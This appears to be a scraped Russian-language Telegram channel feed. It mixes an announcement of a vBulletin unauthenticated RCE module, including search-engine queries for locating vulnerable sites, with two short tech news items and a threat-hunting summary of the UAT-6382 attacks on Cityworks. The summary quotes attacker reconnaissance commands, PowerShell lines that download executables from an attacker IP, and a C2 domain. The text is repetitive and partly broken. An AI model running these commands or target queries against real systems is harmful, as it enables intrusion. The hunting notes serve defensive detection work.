Forwarded from 1N73LL1G3NC3
Unauthenticated RCE module for vBulletin 5.1.0-6.0.3
Write-up: https://karmainsecurity.com/dont-call-that-protected-method-vbulletin-rce
Search query:
Write-up: https://karmainsecurity.com/dont-call-that-protected-method-vbulletin-rce
Search query:
ZoomEye: app="vBulletin"
Shodan: http.html:"content=\"vBulletin"
FOFA: app="vBulletin"
www.opennet.ru
Релиз ядра Linux 6.15
После двух месяцев разработки Линус Торвальдс представил релиз ядра Linux 6.15. Среди наиболее заметных изменений: механизм аудита в Landlock, режим закрепления маппинга памяти, подсистема fwctl, драйвер Nova для GPU NVIDIA, реализация хост-системы для гипервизора…
🔗Ссылка:
https://opennet.ru/63305/
https://opennet.ru/63305/
www.opennet.ru
Google оценил возможности квантового компьютера, необходимые для взлома RSA-2048
Компания Google опубликовала результаты прогнозирования возможностей квантового компьютера, необходимого для успешной факторизации параметров 2048-битных RSA-ключей. В ходе исследования был сделан вывод, что теоретически взлом ключа RSA-2048 может быть осуществлён…
🔗Ссылка:
https://opennet.ru/63310/
https://opennet.ru/63310/
Forwarded from Threat Hunting Father 🦔
⚙️ Кампания UAT-6382: эксплуатация 0-day в Cityworks
Cisco Talos выявила серию атак от группы UAT-6382, использующей 0-day уязвимость CVE-2025-0994 (deserialization RCE) в платформе Cityworks, применяемой органами местного самоуправления США.
🧰 Инструментарий
🔸 WebShells
AntSword, Chopper (chinatso), Behinder — размещаются в
🔸 TetraLoader (загрузчик на Rust)
Скомпилирован с использованием MaLoader — malware-билдера.
Распаковывает shellcode и внедряет его в легитимные процессы (`notepad.exe`,
🔸 Payloads
Cobalt Strike Beacons — используют HTTPS C2 (например,
VShell — легкий RAT на Go: команды, прокси, скриншоты, файловые операции. Панель управления преимущественно на китайском.
🔎 Hunting Notes
🔹 Обнаруженные команды:
🔹 Что ещё искать:
PowerShell с
Размещение ASP/ASPX файлов в
Инъекции в
C2-домены
Запросы к URI вроде
Rust-бинарники со встроенным shellcode и артефактами MaLoader
🔗 https://blog.talosintelligence.com/uat-6382-exploits-cityworks-vulnerability/
🦔 THF
Cisco Talos выявила серию атак от группы UAT-6382, использующей 0-day уязвимость CVE-2025-0994 (deserialization RCE) в платформе Cityworks, применяемой органами местного самоуправления США.
🧰 Инструментарий
🔸 WebShells
AntSword, Chopper (chinatso), Behinder — размещаются в
inetpub\wwwroot, используются как бэкдоры.🔸 TetraLoader (загрузчик на Rust)
Скомпилирован с использованием MaLoader — malware-билдера.
Распаковывает shellcode и внедряет его в легитимные процессы (`notepad.exe`,
dllhost.exe, gpupdate.exe`) через `NtMapViewOfSection, RtlCreateUserThread и др.🔸 Payloads
Cobalt Strike Beacons — используют HTTPS C2 (например,
cdn[.]lgaircon[.]xyz`) и маскируются под .js`-запросы.VShell — легкий RAT на Go: команды, прокси, скриншоты, файловые операции. Панель управления преимущественно на китайском.
🔎 Hunting Notes
🔹 Обнаруженные команды:
cmd.exe /c ipconfig
cmd.exe /c pwd
cmd.exe /c dir
cmd.exe /c dir ..
cmd.exe /c dir c:\
cmd.exe /c dir c:\inetpub
cmd.exe /c tasklist
cmd.exe /c dir c:\inetpub\wwwroot
cmd.exe /c dir c:\inetpub\wwwroot\CityworksServer\WebSite
cmd.exe /c dir c:\inetpub\wwwroot\CityworksServer\WebSite\Assets
cmd.exe /c dir c:\inetpub\wwwroot\CityworksServer\
cmd.exe /c copy c:\inetpub\wwwroot\CityworksServer\<backup_archives> c:\inetpub\wwwroot\CityworksServer\Uploads\
powershell -Command Invoke-WebRequest -Uri 'http://IP:3219/LVLWPH.exe' -OutFile '<путь>\LVLWPH.exe'
powershell -Command Invoke-WebRequest -Uri 'http://IP:3219/MCUCAT.exe' -OutFile 'C:\windows\temp\z1.exe'
powershell -Command Invoke-WebRequest -Uri 'http://IP:3219/TJPLYT.exe' -OutFile 'C:\windows\temp\z33.exe'
powershell -Command Invoke-WebRequest -Uri 'http://IP:3219/z44.exe' -OutFile 'C:\windows\temp\z44.exe'🔹 Что ещё искать:
PowerShell с
Invoke-WebRequest к IP-адресамРазмещение ASP/ASPX файлов в
inetpub\wwwrootИнъекции в
dllhost.exe, gpupdate.exe, notepad.exeC2-домены
Запросы к URI вроде
/jquery-3.3.1.min.js, /owa/... — подделка под легитимный JS-трафикRust-бинарники со встроенным shellcode и артефактами MaLoader
🦔 THF
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM